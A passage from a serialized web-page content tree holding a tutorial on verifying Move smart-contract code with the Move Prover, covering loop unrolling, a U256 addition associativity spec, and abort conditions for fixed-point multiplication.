,{"style":6953},[15547],{"type":31,"value":6997},{"type":25,"tag":216,"props":15549,"children":15550},{"style":6947},[15551],{"type":31,"value":2289},{"type":25,"tag":216,"props":15553,"children":15554},{"style":6953},[15555],{"type":31,"value":1472},{"type":25,"tag":216,"props":15557,"children":15558},{"style":6947},[15559],{"type":31,"value":12374},{"type":25,"tag":216,"props":15561,"children":15562},{"style":6964},[15563],{"type":31,"value":7701},{"type":25,"tag":216,"props":15565,"children":15566},{"style":6947},[15567],{"type":31,"value":12609},{"type":25,"tag":216,"props":15569,"children":15570},{"style":6964},[15571],{"type":31,"value":12614},{"type":25,"tag":216,"props":15573,"children":15574},{"style":6953},[15575],{"type":31,"value":12528},{"type":25,"tag":216,"props":15577,"children":15578},{"style":6947},[15579],{"type":31,"value":12623},{"type":25,"tag":216,"props":15581,"children":15582},{"style":6964},[15583],{"type":31,"value":7701},{"type":25,"tag":216,"props":15585,"children":15586},{"style":6947},[15587],{"type":31,"value":12609},{"type":25,"tag":216,"props":15589,"children":15590},{"style":6964},[15591],{"type":31,"value":12614},{"type":25,"tag":216,"props":15593,"children":15594},{"style":6953},[15595],{"type":31,"value":8519},{"type":25,"tag":216,"props":15597,"children":15598},{"style":6947},[15599],{"type":31,"value":12439},{"type":25,"tag":216,"props":15601,"children":15602},{"style":6964},[15603],{"type":31,"value":6967},{"type":25,"tag":216,"props":15605,"children":15606},{"class":6922,"line":7216},[15607],{"type":25,"tag":216,"props":15608,"children":15609},{"style":6964},[15610],{"type":31,"value":12874},{"type":25,"tag":216,"props":15612,"children":15613},{"class":6922,"line":7244},[15614,15618,15622,15626,15630],{"type":25,"tag":216,"props":15615,"children":15616},{"style":6964},[15617],{"type":31,"value":15208},{"type":25,"tag":216,"props":15619,"children":15620},{"style":6947},[15621],{"type":31,"value":2289},{"type":25,"tag":216,"props":15623,"children":15624},{"style":6953},[15625],{"type":31,"value":12672},{"type":25,"tag":216,"props":15627,"children":15628},{"style":6947},[15629],{"type":31,"value":12439},{"type":25,"tag":216,"props":15631,"children":15632},{"style":6964},[15633],{"type":31,"value":7107},{"type":25,"tag":216,"props":15635,"children":15636},{"class":6922,"line":7257},[15637],{"type":25,"tag":216,"props":15638,"children":15639},{"style":6964},[15640],{"type":31,"value":15232},{"type":25,"tag":38,"props":15642,"children":15643},{},[15644],{"type":31,"value":15645},"Loop invariants are often difficult to write, especially for nontrivial loop bodies.",{"type":25,"tag":38,"props":15647,"children":15648},{},[15649,15651,15656],{"type":31,"value":15650},"The second solution to dealing with loops is to unroll the loop. This technique works in this particular situation because, as we can observe, the loop within the ",{"type":25,"tag":82,"props":15652,"children":15654},{"className":15653},[],[15655],{"type":31,"value":13594},{"type":31,"value":15657}," function will always iterate exactly 4 times:",{"type":25,"tag":206,"props":15659,"children":15661},{"code":15660,"language":6914,"meta":7,"className":6915,"style":7},"/// Total words in `U256` (64 * 4 = 256).\nconst WORDS: u64 = 4;\n\n[...]\n\nlet i = 0;\nwhile (i \u003C WORDS) {\n    let a1 = get(&a, i);\n    let b1 = get(&b, i);\n\n[...]\n",[15662],{"type":25,"tag":82,"props":15663,"children":15664},{"__ignoreMap":7},[15665,15673,15706,15713,15729,15736,15760,15784,15829,15873,15880],{"type":25,"tag":216,"props":15666,"children":15667},{"class":6922,"line":6923},[15668],{"type":25,"tag":216,"props":15669,"children":15670},{"style":6927},[15671],{"type":31,"value":15672},"/// Total words in `U256` (64 * 4 = 256).\n",{"type":25,"tag":216,"props":15674,"children":15675},{"class":6922,"line":6769},[15676,15680,15685,15689,15693,15697,15702],{"type":25,"tag":216,"props":15677,"children":15678},{"style":6936},[15679],{"type":31,"value":13611},{"type":25,"tag":216,"props":15681,"children":15682},{"style":6964},[15683],{"type":31,"value":15684}," WORDS",{"type":25,"tag":216,"props":15686,"children":15687},{"style":6953},[15688],{"type":31,"value":1472},{"type":25,"tag":216,"props":15690,"children":15691},{"style":7375},[15692],{"type":31,"value":9811},{"type":25,"tag":216,"props":15694,"children":15695},{"style":6953},[15696],{"type":31,"value":6956},{"type":25,"tag":216,"props":15698,"children":15699},{"style":6989},[15700],{"type":31,"value":15701}," 4",{"type":25,"tag":216,"props":15703,"children":15704},{"style":6964},[15705],{"type":31,"value":6967},{"type":25,"tag":216,"props":15707,"children":15708},{"class":6922,"line":6778},[15709],{"type":25,"tag":216,"props":15710,"children":15711},{"emptyLinePlaceholder":16},[15712],{"type":31,"value":7642},{"type":25,"tag":216,"props":15714,"children":15715},{"class":6922,"line":7005},[15716,15720,15724],{"type":25,"tag":216,"props":15717,"children":15718},{"style":6964},[15719],{"type":31,"value":7701},{"type":25,"tag":216,"props":15721,"children":15722},{"style":6953},[15723],{"type":31,"value":13547},{"type":25,"tag":216,"props":15725,"children":15726},{"style":6964},[15727],{"type":31,"value":15728},"]\n",{"type":25,"tag":216,"props":15730,"children":15731},{"class":6922,"line":7110},[15732],{"type":25,"tag":216,"props":15733,"children":15734},{"emptyLinePlaceholder":16},[15735],{"type":31,"value":7642},{"type":25,"tag":216,"props":15737,"children":15738},{"class":6922,"line":7216},[15739,15744,15748,15752,15756],{"type":25,"tag":216,"props":15740,"children":15741},{"style":6936},[15742],{"type":31,"value":15743},"let",{"type":25,"tag":216,"props":15745,"children":15746},{"style":6947},[15747],{"type":31,"value":7354},{"type":25,"tag":216,"props":15749,"children":15750},{"style":6953},[15751],{"type":31,"value":6956},{"type":25,"tag":216,"props":15753,"children":15754},{"style":6989},[15755],{"type":31,"value":6992},{"type":25,"tag":216,"props":15757,"children":15758},{"style":6964},[15759],{"type":31,"value":6967},{"type":25,"tag":216,"props":15761,"children":15762},{"class":6922,"line":7244},[15763,15767,15771,15775,15779],{"type":25,"tag":216,"props":15764,"children":15765},{"style":6973},[15766],{"type":31,"value":15417},{"type":25,"tag":216,"props":15768,"children":15769},{"style":6964},[15770],{"type":31,"value":7016},{"type":25,"tag":216,"props":15772,"children":15773},{"style":6947},[15774],{"type":31,"value":2289},{"type":25,"tag":216,"props":15776,"children":15777},{"style":6953},[15778],{"type":31,"value":12672},{"type":25,"tag":216,"props":15780,"children":15781},{"style":6964},[15782],{"type":31,"value":15783}," WORDS) {\n",{"type":25,"tag":216,"props":15785,"children":15786},{"class":6922,"line":7257},[15787,15791,15796,15800,15805,15809,15813,15817,15821,15825],{"type":25,"tag":216,"props":15788,"children":15789},{"style":6936},[15790],{"type":31,"value":6939},{"type":25,"tag":216,"props":15792,"children":15793},{"style":6947},[15794],{"type":31,"value":15795}," a1",{"type":25,"tag":216,"props":15797,"children":15798},{"style":6953},[15799],{"type":31,"value":6956},{"type":25,"tag":216,"props":15801,"children":15802},{"style":7047},[15803],{"type":31,"value":15804}," get",{"type":25,"tag":216,"props":15806,"children":15807},{"style":6964},[15808],{"type":31,"value":1850},{"type":25,"tag":216,"props":15810,"children":15811},{"style":6953},[15812],{"type":31,"value":7059},{"type":25,"tag":216,"props":15814,"children":15815},{"style":6947},[15816],{"type":31,"value":162},{"type":25,"tag":216,"props":15818,"children":15819},{"style":6964},[15820],{"type":31,"value":7026},{"type":25,"tag":216,"props":15822,"children":15823},{"style":6947},[15824],{"type":31,"value":2289},{"type":25,"tag":216,"props":15826,"children":15827},{"style":6964},[15828],{"type":31,"value":7797},{"type":25,"tag":216,"props":15830,"children":15831},{"class":6922,"line":7275},[15832,15836,15841,15845,15849,15853,15857,15861,15865,15869],{"type":25,"tag":216,"props":15833,"children":15834},{"style":6936},[15835],{"type":31,"value":6939},{"type":25,"tag":216,"props":15837,"children":15838},{"style":6947},[15839],{"type":31,"value":15840}," b1",{"type":25,"tag":216,"props":15842,"children":15843},{"style":6953},[15844],{"type":31,"value":6956},{"type":25,"tag":216,"props":15846,"children":15847},{"style":7047},[15848],{"type":31,"value":15804},{"type":25,"tag":216,"props":15850,"children":15851},{"style":6964},[15852],{"type":31,"value":1850},{"type":25,"tag":216,"props":15854,"children":15855},{"style":6953},[15856],{"type":31,"value":7059},{"type":25,"tag":216,"props":15858,"children":15859},{"style":6947},[15860],{"type":31,"value":7171},{"type":25,"tag":216,"props":15862,"children":15863},{"style":6964},[15864],{"type":31,"value":7026},{"type":25,"tag":216,"props":15866,"children":15867},{"style":6947},[15868],{"type":31,"value":2289},{"type":25,"tag":216,"props":15870,"children":15871},{"style":6964},[15872],{"type":31,"value":7797},{"type":25,"tag":216,"props":15874,"children":15875},{"class":6922,"line":7296},[15876],{"type":25,"tag":216,"props":15877,"children":15878},{"emptyLinePlaceholder":16},[15879],{"type":31,"value":7642},{"type":25,"tag":216,"props":15881,"children":15882},{"class":6922,"line":7305},[15883,15887,15891],{"type":25,"tag":216,"props":15884,"children":15885},{"style":6964},[15886],{"type":31,"value":7701},{"type":25,"tag":216,"props":15888,"children":15889},{"style":6953},[15890],{"type":31,"value":13547},{"type":25,"tag":216,"props":15892,"children":15893},{"style":6964},[15894],{"type":31,"value":15728},{"type":25,"tag":38,"props":15896,"children":15897},{},[15898],{"type":31,"value":15899},"Unrolling the function and running again the Move Prover will print out a \"Success\" message!",{"type":25,"tag":206,"props":15901,"children":15903},{"code":15902},"SUCCESS proving 1 modules from package `u256` in 9.685s\n{\n    \"Result\": \"Success\"\n}\n",[15904],{"type":25,"tag":82,"props":15905,"children":15906},{"__ignoreMap":7},[15907],{"type":31,"value":15902},{"type":25,"tag":38,"props":15909,"children":15910},{},[15911,15913,15918,15919,15925],{"type":31,"value":15912},"For the ",{"type":25,"tag":9273,"props":15914,"children":15915},{},[15916],{"type":31,"value":15917},"Associative Property",{"type":31,"value":7016},{"type":25,"tag":82,"props":15920,"children":15922},{"className":15921},[],[15923],{"type":31,"value":15924},"a+(b+c) = (a+b)+c",{"type":31,"value":15926},") to be true, changing the grouping of addends should not change the sum. To verify this, we will first implement a function which simulates this property:",{"type":25,"tag":206,"props":15928,"children":15930},{"code":15929,"language":6914,"meta":7,"className":6915,"style":7},"fun add_assoc_property(a: U256, b: U256, c: U256): bool {\n    let result_1 = add(b, c);\n    let result_11 = add(a, result_1);\n    let result_2 = add(a, b);\n    let result_22 = add(c, result_2);\n\n    let cmp = compare(&result_11, &result_22);\n    if ( cmp == EQUAL ) true else false\n}\n",[15931],{"type":25,"tag":82,"props":15932,"children":15933},{"__ignoreMap":7},[15934,16011,16050,16091,16130,16171,16178,16228,16268],{"type":25,"tag":216,"props":15935,"children":15936},{"class":6922,"line":6923},[15937,15941,15946,15950,15954,15958,15962,15966,15970,15974,15978,15982,15986,15990,15994,15998,16002,16007],{"type":25,"tag":216,"props":15938,"children":15939},{"style":6947},[15940],{"type":31,"value":11059},{"type":25,"tag":216,"props":15942,"children":15943},{"style":7047},[15944],{"type":31,"value":15945}," add_assoc_property",{"type":25,"tag":216,"props":15947,"children":15948},{"style":6964},[15949],{"type":31,"value":1850},{"type":25,"tag":216,"props":15951,"children":15952},{"style":6947},[15953],{"type":31,"value":162},{"type":25,"tag":216,"props":15955,"children":15956},{"style":6953},[15957],{"type":31,"value":1472},{"type":25,"tag":216,"props":15959,"children":15960},{"style":7375},[15961],{"type":31,"value":8678},{"type":25,"tag":216,"props":15963,"children":15964},{"style":6964},[15965],{"type":31,"value":7026},{"type":25,"tag":216,"props":15967,"children":15968},{"style":6947},[15969],{"type":31,"value":7171},{"type":25,"tag":216,"props":15971,"children":15972},{"style":6953},[15973],{"type":31,"value":1472},{"type":25,"tag":216,"props":15975,"children":15976},{"style":7375},[15977],{"type":31,"value":8678},{"type":25,"tag":216,"props":15979,"children":15980},{"style":6964},[15981],{"type":31,"value":7026},{"type":25,"tag":216,"props":15983,"children":15984},{"style":6947},[15985],{"type":31,"value":2254},{"type":25,"tag":216,"props":15987,"children":15988},{"style":6953},[15989],{"type":31,"value":1472},{"type":25,"tag":216,"props":15991,"children":15992},{"style":7375},[15993],{"type":31,"value":8678},{"type":25,"tag":216,"props":15995,"children":15996},{"style":6964},[15997],{"type":31,"value":1888},{"type":25,"tag":216,"props":15999,"children":16000},{"style":6953},[16001],{"type":31,"value":1472},{"type":25,"tag":216,"props":16003,"children":16004},{"style":7375},[16005],{"type":31,"value":16006}," bool",{"type":25,"tag":216,"props":16008,"children":16009},{"style":6964},[16010],{"type":31,"value":7241},{"type":25,"tag":216,"props":16012,"children":16013},{"class":6922,"line":6769},[16014,16018,16022,16026,16030,16034,16038,16042,16046],{"type":25,"tag":216,"props":16015,"children":16016},{"style":6936},[16017],{"type":31,"value":6939},{"type":25,"tag":216,"props":16019,"children":16020},{"style":6947},[16021],{"type":31,"value":12144},{"type":25,"tag":216,"props":16023,"children":16024},{"style":6953},[16025],{"type":31,"value":6956},{"type":25,"tag":216,"props":16027,"children":16028},{"style":7047},[16029],{"type":31,"value":13537},{"type":25,"tag":216,"props":16031,"children":16032},{"style":6964},[16033],{"type":31,"value":1850},{"type":25,"tag":216,"props":16035,"children":16036},{"style":6947},[16037],{"type":31,"value":7171},{"type":25,"tag":216,"props":16039,"children":16040},{"style":6964},[16041],{"type":31,"value":7026},{"type":25,"tag":216,"props":16043,"children":16044},{"style":6947},[16045],{"type":31,"value":2254},{"type":25,"tag":216,"props":16047,"children":16048},{"style":6964},[16049],{"type":31,"value":7797},{"type":25,"tag":216,"props":16051,"children":16052},{"class":6922,"line":6778},[16053,16057,16062,16066,16070,16074,16078,16082,16087],{"type":25,"tag":216,"props":16054,"children":16055},{"style":6936},[16056],{"type":31,"value":6939},{"type":25,"tag":216,"props":16058,"children":16059},{"style":6947},[16060],{"type":31,"value":16061}," result_11",{"type":25,"tag":216,"props":16063,"children":16064},{"style":6953},[16065],{"type":31,"value":6956},{"type":25,"tag":216,"props":16067,"children":16068},{"style":7047},[16069],{"type":31,"value":13537},{"type":25,"tag":216,"props":16071,"children":16072},{"style":6964},[16073],{"type":31,"value":1850},{"type":25,"tag":216,"props":16075,"children":16076},{"style":6947},[16077],{"type":31,"value":162},{"type":25,"tag":216,"props":16079,"children":16080},{"style":6964},[16081],{"type":31,"value":7026},{"type":25,"tag":216,"props":16083,"children":16084},{"style":6947},[16085],{"type":31,"value":16086},"result_1",{"type":25,"tag":216,"props":16088,"children":16089},{"style":6964},[16090],{"type":31,"value":7797},{"type":25,"tag":216,"props":16092,"children":16093},{"class":6922,"line":7005},[16094,16098,16102,16106,16110,16114,16118,16122,16126],{"type":25,"tag":216,"props":16095,"children":16096},{"style":6936},[16097],{"type":31,"value":6939},{"type":25,"tag":216,"props":16099,"children":16100},{"style":6947},[16101],{"type":31,"value":12170},{"type":25,"tag":216,"props":16103,"children":16104},{"style":6953},[16105],{"type":31,"value":6956},{"type":25,"tag":216,"props":16107,"children":16108},{"style":7047},[16109],{"type":31,"value":13537},{"type":25,"tag":216,"props":16111,"children":16112},{"style":6964},[16113],{"type":31,"value":1850},{"type":25,"tag":216,"props":16115,"children":16116},{"style":6947},[16117],{"type":31,"value":162},{"type":25,"tag":216,"props":16119,"children":16120},{"style":6964},[16121],{"type":31,"value":7026},{"type":25,"tag":216,"props":16123,"children":16124},{"style":6947},[16125],{"type":31,"value":7171},{"type":25,"tag":216,"props":16127,"children":16128},{"style":6964},[16129],{"type":31,"value":7797},{"type":25,"tag":216,"props":16131,"children":16132},{"class":6922,"line":7110},[16133,16137,16142,16146,16150,16154,16158,16162,16167],{"type":25,"tag":216,"props":16134,"children":16135},{"style":6936},[16136],{"type":31,"value":6939},{"type":25,"tag":216,"props":16138,"children":16139},{"style":6947},[16140],{"type":31,"value":16141}," result_22",{"type":25,"tag":216,"props":16143,"children":16144},{"style":6953},[16145],{"type":31,"value":6956},{"type":25,"tag":216,"props":16147,"children":16148},{"style":7047},[16149],{"type":31,"value":13537},{"type":25,"tag":216,"props":16151,"children":16152},{"style":6964},[16153],{"type":31,"value":1850},{"type":25,"tag":216,"props":16155,"children":16156},{"style":6947},[16157],{"type":31,"value":2254},{"type":25,"tag":216,"props":16159,"children":16160},{"style":6964},[16161],{"type":31,"value":7026},{"type":25,"tag":216,"props":16163,"children":16164},{"style":6947},[16165],{"type":31,"value":16166},"result_2",{"type":25,"tag":216,"props":16168,"children":16169},{"style":6964},[16170],{"type":31,"value":7797},{"type":25,"tag":216,"props":16172,"children":16173},{"class":6922,"line":7216},[16174],{"type":25,"tag":216,"props":16175,"children":16176},{"emptyLinePlaceholder":16},[16177],{"type":31,"value":7642},{"type":25,"tag":216,"props":16179,"children":16180},{"class":6922,"line":7244},[16181,16185,16189,16193,16198,16202,16206,16211,16215,16219,16224],{"type":25,"tag":216,"props":16182,"children":16183},{"style":6936},[16184],{"type":31,"value":6939},{"type":25,"tag":216,"props":16186,"children":16187},{"style":6947},[16188],{"type":31,"value":11812},{"type":25,"tag":216,"props":16190,"children":16191},{"style":6953},[16192],{"type":31,"value":6956},{"type":25,"tag":216,"props":16194,"children":16195},{"style":7047},[16196],{"type":31,"value":16197}," compare",{"type":25,"tag":216,"props":16199,"children":16200},{"style":6964},[16201],{"type":31,"value":1850},{"type":25,"tag":216,"props":16203,"children":16204},{"style":6953},[16205],{"type":31,"value":7059},{"type":25,"tag":216,"props":16207,"children":16208},{"style":6947},[16209],{"type":31,"value":16210},"result_11",{"type":25,"tag":216,"props":16212,"children":16213},{"style":6964},[16214],{"type":31,"value":7026},{"type":25,"tag":216,"props":16216,"children":16217},{"style":6953},[16218],{"type":31,"value":7059},{"type":25,"tag":216,"props":16220,"children":16221},{"style":6947},[16222],{"type":31,"value":16223},"result_22",{"type":25,"tag":216,"props":16225,"children":16226},{"style":6964},[16227],{"type":31,"value":7797},{"type":25,"tag":216,"props":16229,"children":16230},{"class":6922,"line":7257},[16231,16236,16241,16245,16249,16254,16258,16263],{"type":25,"tag":216,"props":16232,"children":16233},{"style":6973},[16234],{"type":31,"value":16235},"    if",{"type":25,"tag":216,"props":16237,"children":16238},{"style":6964},[16239],{"type":31,"value":16240}," ( ",{"type":25,"tag":216,"props":16242,"children":16243},{"style":6947},[16244],{"type":31,"value":11877},{"type":25,"tag":216,"props":16246,"children":16247},{"style":6953},[16248],{"type":31,"value":7232},{"type":25,"tag":216,"props":16250,"children":16251},{"style":6964},[16252],{"type":31,"value":16253}," EQUAL ) ",{"type":25,"tag":216,"props":16255,"children":16256},{"style":6936},[16257],{"type":31,"value":230},{"type":25,"tag":216,"props":16259,"children":16260},{"style":6973},[16261],{"type":31,"value":16262}," else",{"type":25,"tag":216,"props":16264,"children":16265},{"style":6936},[16266],{"type":31,"value":16267}," false\n",{"type":25,"tag":216,"props":16269,"children":16270},{"class":6922,"line":7275},[16271],{"type":25,"tag":216,"props":16272,"children":16273},{"style":6964},[16274],{"type":31,"value":7874},{"type":25,"tag":38,"props":16276,"children":16277},{},[16278],{"type":31,"value":16279},"Lastly, we want to create a spec block which aborts if the sum overflows, and ensures that the result of the function is true:",{"type":25,"tag":206,"props":16281,"children":16283},{"code":16282,"language":6914,"meta":7,"className":6915,"style":7},"spec add_assoc_property {\n    aborts_if (value_of_U256(a) + value_of_U256(b)) + value_of_U256(c) >= P64 * P64 * P64 * P64;\n    ensures result == true;\n}\n",[16284],{"type":25,"tag":82,"props":16285,"children":16286},{"__ignoreMap":7},[16287,16302,16406,16430],{"type":25,"tag":216,"props":16288,"children":16289},{"class":6922,"line":6923},[16290,16294,16298],{"type":25,"tag":216,"props":16291,"children":16292},{"style":6947},[16293],{"type":31,"value":12227},{"type":25,"tag":216,"props":16295,"children":16296},{"style":6947},[16297],{"type":31,"value":15945},{"type":25,"tag":216,"props":16299,"children":16300},{"style":6964},[16301],{"type":31,"value":7241},{"type":25,"tag":216,"props":16303,"children":16304},{"class":6922,"line":6769},[16305,16309,16313,16318,16322,16326,16330,16334,16338,16342,16346,16350,16354,16358,16362,16366,16370,16374,16378,16382,16386,16390,16394,16398,16402],{"type":25,"tag":216,"props":16306,"children":16307},{"style":6947},[16308],{"type":31,"value":13859},{"type":25,"tag":216,"props":16310,"children":16311},{"style":6964},[16312],{"type":31,"value":7016},{"type":25,"tag":216,"props":16314,"children":16315},{"style":7047},[16316],{"type":31,"value":16317},"value_of_U256",{"type":25,"tag":216,"props":16319,"children":16320},{"style":6964},[16321],{"type":31,"value":1850},{"type":25,"tag":216,"props":16323,"children":16324},{"style":6947},[16325],{"type":31,"value":162},{"type":25,"tag":216,"props":16327,"children":16328},{"style":6964},[16329],{"type":31,"value":7036},{"type":25,"tag":216,"props":16331,"children":16332},{"style":6953},[16333],{"type":31,"value":3539},{"type":25,"tag":216,"props":16335,"children":16336},{"style":7047},[16337],{"type":31,"value":13660},{"type":25,"tag":216,"props":16339,"children":16340},{"style":6964},[16341],{"type":31,"value":1850},{"type":25,"tag":216,"props":16343,"children":16344},{"style":6947},[16345],{"type":31,"value":7171},{"type":25,"tag":216,"props":16347,"children":16348},{"style":6964},[16349],{"type":31,"value":12790},{"type":25,"tag":216,"props":16351,"children":16352},{"style":6953},[16353],{"type":31,"value":3539},{"type":25,"tag":216,"props":16355,"children":16356},{"style":7047},[16357],{"type":31,"value":13660},{"type":25,"tag":216,"props":16359,"children":16360},{"style":6964},[16361],{"type":31,"value":1850},{"type":25,"tag":216,"props":16363,"children":16364},{"style":6947},[16365],{"type":31,"value":2254},{"type":25,"tag":216,"props":16367,"children":16368},{"style":6964},[16369],{"type":31,"value":7036},{"type":25,"tag":216,"props":16371,"children":16372},{"style":6953},[16373],{"type":31,"value":13900},{"type":25,"tag":216,"props":16375,"children":16376},{"style":7375},[16377],{"type":31,"value":13616},{"type":25,"tag":216,"props":16379,"children":16380},{"style":6953},[16381],{"type":31,"value":13773},{"type":25,"tag":216,"props":16383,"children":16384},{"style":7375},[16385],{"type":31,"value":13616},{"type":25,"tag":216,"props":16387,"children":16388},{"style":6953},[16389],{"type":31,"value":13773},{"type":25,"tag":216,"props":16391,"children":16392},{"style":7375},[16393],{"type":31,"value":13616},{"type":25,"tag":216,"props":16395,"children":16396},{"style":6953},[16397],{"type":31,"value":13773},{"type":25,"tag":216,"props":16399,"children":16400},{"style":7375},[16401],{"type":31,"value":13616},{"type":25,"tag":216,"props":16403,"children":16404},{"style":6964},[16405],{"type":31,"value":6967},{"type":25,"tag":216,"props":16407,"children":16408},{"class":6922,"line":6778},[16409,16413,16417,16421,16426],{"type":25,"tag":216,"props":16410,"children":16411},{"style":6947},[16412],{"type":31,"value":14157},{"type":25,"tag":216,"props":16414,"children":16415},{"style":6947},[16416],{"type":31,"value":13115},{"type":25,"tag":216,"props":16418,"children":16419},{"style":6953},[16420],{"type":31,"value":7232},{"type":25,"tag":216,"props":16422,"children":16423},{"style":6936},[16424],{"type":31,"value":16425}," true",{"type":25,"tag":216,"props":16427,"children":16428},{"style":6964},[16429],{"type":31,"value":6967},{"type":25,"tag":216,"props":16431,"children":16432},{"class":6922,"line":7005},[16433],{"type":25,"tag":216,"props":16434,"children":16435},{"style":6964},[16436],{"type":31,"value":7874},{"type":25,"tag":38,"props":16438,"children":16439},{},[16440],{"type":31,"value":16441},"Running move prover with the new specifications, we can confirm that there are no verification errors:",{"type":25,"tag":206,"props":16443,"children":16444},{"code":15902},[16445],{"type":25,"tag":82,"props":16446,"children":16447},{"__ignoreMap":7},[16448],{"type":31,"value":15902},{"type":25,"tag":38,"props":16450,"children":16451},{},[16452,16454,16461],{"type":31,"value":16453},"For a more complete document detailing Move Prover syntax, we recommend referring to ",{"type":25,"tag":162,"props":16455,"children":16458},{"href":16456,"rel":16457},"https://github.com/move-language/move/blob/main/language/move-prover/doc/user/spec-lang.md",[166],[16459],{"type":31,"value":16460},"spec-lang.md",{"type":31,"value":16462}," in the Move Repository.",{"type":25,"tag":26,"props":16464,"children":16466},{"id":16465},"use-cases",[16467],{"type":31,"value":16468},"Use Cases",{"type":25,"tag":38,"props":16470,"children":16471},{},[16472],{"type":31,"value":16473},"Formal verification can prove that a smart contract satisfies the given requirements for all possible cases without even running the contract. The hard part is coming up with the specifications.",{"type":25,"tag":38,"props":16475,"children":16476},{},[16477],{"type":31,"value":16478},"Here, we hope to explore some practical examples of possible verification ideas.",{"type":25,"tag":606,"props":16480,"children":16482},{"id":16481},"error-conditions",[16483],{"type":31,"value":16484},"Error Conditions",{"type":25,"tag":38,"props":16486,"children":16487},{},[16488,16490,16496],{"type":31,"value":16489},"Taking an example from ",{"type":25,"tag":82,"props":16491,"children":16493},{"className":16492},[],[16494],{"type":31,"value":16495},"std::fixed_point32",{"type":31,"value":16497},", it's often useful to explicitly define when a function might abort. For example, arithmetic operations with fixed point numbers should only error if they overflow.",{"type":25,"tag":206,"props":16499,"children":16501},{"code":16500,"language":6914,"meta":7,"className":6915,"style":7},"      spec schema MultiplyAbortsIf {\n          val: num;\n          multiplier: FixedPoint32;\n          aborts_if spec_multiply_u64(val, multiplier) > MAX_U64 with EMULTIPLICATION;\n      }\n      spec fun spec_multiply_u64(val: num, multiplier: FixedPoint32): num {\n          (val * multiplier.value) >> 32\n      }\n",[16502],{"type":25,"tag":82,"props":16503,"children":16504},{"__ignoreMap":7},[16505,16526,16546,16567,16613,16621,16684,16723],{"type":25,"tag":216,"props":16506,"children":16507},{"class":6922,"line":6923},[16508,16512,16517,16522],{"type":25,"tag":216,"props":16509,"children":16510},{"style":6947},[16511],{"type":31,"value":12882},{"type":25,"tag":216,"props":16513,"children":16514},{"style":6947},[16515],{"type":31,"value":16516}," schema",{"type":25,"tag":216,"props":16518,"children":16519},{"style":7375},[16520],{"type":31,"value":16521}," MultiplyAbortsIf",{"type":25,"tag":216,"props":16523,"children":16524},{"style":6964},[16525],{"type":31,"value":7241},{"type":25,"tag":216,"props":16527,"children":16528},{"class":6922,"line":6769},[16529,16534,16538,16542],{"type":25,"tag":216,"props":16530,"children":16531},{"style":6947},[16532],{"type":31,"value":16533},"          val",{"type":25,"tag":216,"props":16535,"children":16536},{"style":6953},[16537],{"type":31,"value":1472},{"type":25,"tag":216,"props":16539,"children":16540},{"style":6947},[16541],{"type":31,"value":13689},{"type":25,"tag":216,"props":16543,"children":16544},{"style":6964},[16545],{"type":31,"value":6967},{"type":25,"tag":216,"props":16547,"children":16548},{"class":6922,"line":6778},[16549,16554,16558,16563],{"type":25,"tag":216,"props":16550,"children":16551},{"style":6947},[16552],{"type":31,"value":16553},"          multiplier",{"type":25,"tag":216,"props":16555,"children":16556},{"style":6953},[16557],{"type":31,"value":1472},{"type":25,"tag":216,"props":16559,"children":16560},{"style":7375},[16561],{"type":31,"value":16562}," FixedPoint32",{"type":25,"tag":216,"props":16564,"children":16565},{"style":6964},[16566],{"type":31,"value":6967},{"type":25,"tag":216,"props":16568,"children":16569},{"class":6922,"line":7005},[16570,16575,16580,16584,16589,16593,16598,16603,16608],{"type":25,"tag":216,"props":16571,"children":16572},{"style":6947},[16573],{"type":31,"value":16574},"          aborts_if",{"type":25,"tag":216,"props":16576,"children":16577},{"style":7047},[16578],{"type":31,"value":16579}," spec_multiply_u64",{"type":25,"tag":216,"props":16581,"children":16582},{"style":6964},[16583],{"type":31,"value":1850},{"type":25,"tag":216,"props":16585,"children":16586},{"style":6947},[16587],{"type":31,"value":16588},"val",{"type":25,"tag":216,"props":16590,"children":16591},{"style":6964},[16592],{"type":31,"value":7026},{"type":25,"tag":216,"props":16594,"children":16595},{"style":6947},[16596],{"type":31,"value":16597},"multiplier",{"type":25,"tag":216,"props":16599,"children":16600},{"style":6964},[16601],{"type":31,"value":16602},") > MAX_U64 ",{"type":25,"tag":216,"props":16604,"children":16605},{"style":6947},[16606],{"type":31,"value":16607},"with",{"type":25,"tag":216,"props":16609,"children":16610},{"style":6964},[16611],{"type":31,"value":16612}," EMULTIPLICATION;\n",{"type":25,"tag":216,"props":16614,"children":16615},{"class":6922,"line":7110},[16616],{"type":25,"tag":216,"props":16617,"children":16618},{"style":6964},[16619],{"type":31,"value":16620},"      }\n",{"type":25,"tag":216,"props":16622,"children":16623},{"class":6922,"line":7216},[16624,16628,16632,16636,16640,16644,16648,16652,16656,16660,16664,16668,16672,16676,16680],{"type":25,"tag":216,"props":16625,"children":16626},{"style":6947},[16627],{"type":31,"value":12882},{"type":25,"tag":216,"props":16629,"children":16630},{"style":6947},[16631],{"type":31,"value":10158},{"type":25,"tag":216,"props":16633,"children":16634},{"style":7047},[16635],{"type":31,"value":16579},{"type":25,"tag":216,"props":16637,"children":16638},{"style":6964},[16639],{"type":31,"value":1850},{"type":25,"tag":216,"props":16641,"children":16642},{"style":6947},[16643],{"type":31,"value":16588},{"type":25,"tag":216,"props":16645,"children":16646},{"style":6953},[16647],{"type":31,"value":1472},{"type":25,"tag":216,"props":16649,"children":16650},{"style":6947},[16651],{"type":31,"value":13689},{"type":25,"tag":216,"props":16653,"children":16654},{"style":6964},[16655],{"type":31,"value":7026},{"type":25,"tag":216,"props":16657,"children":16658},{"style":6947},[16659],{"type":31,"value":16597},{"type":25,"tag":216,"props":16661,"children":16662},{"style":6953},[16663],{"type":31,"value":1472},{"type":25,"tag":216,"props":16665,"children":16666},{"style":7375},[16667],{"type":31,"value":16562},{"type":25,"tag":216,"props":16669,"children":16670},{"style":6964},[16671],{"type":31,"value":1888},{"type":25,"tag":216,"props":16673,"children":16674},{"style":6953},[16675],{"type":31,"value":1472},{"type":25,"tag":216,"props":16677,"children":16678},{"style":6947},[16679],{"type":31,"value":13689},{"type":25,"tag":216,"props":16681,"children":16682},{"style":6964},[16683],{"type":31,"value":7241},{"type":25,"tag":216,"props":16685,"children":16686},{"class":6922,"line":7244},[16687,16691,16695,16699,16704,16708,16713,16718],{"type":25,"tag":216,"props":16688,"children":16689},{"style":6964},[16690],{"type":31,"value":12663},{"type":25,"tag":216,"props":16692,"children":16693},{"style":6947},[16694],{"type":31,"value":16588},{"type":25,"tag":216,"props":16696,"children":16697},{"style":6953},[16698],{"type":31,"value":13773},{"type":25,"tag":216,"props":16700,"children":16701},{"s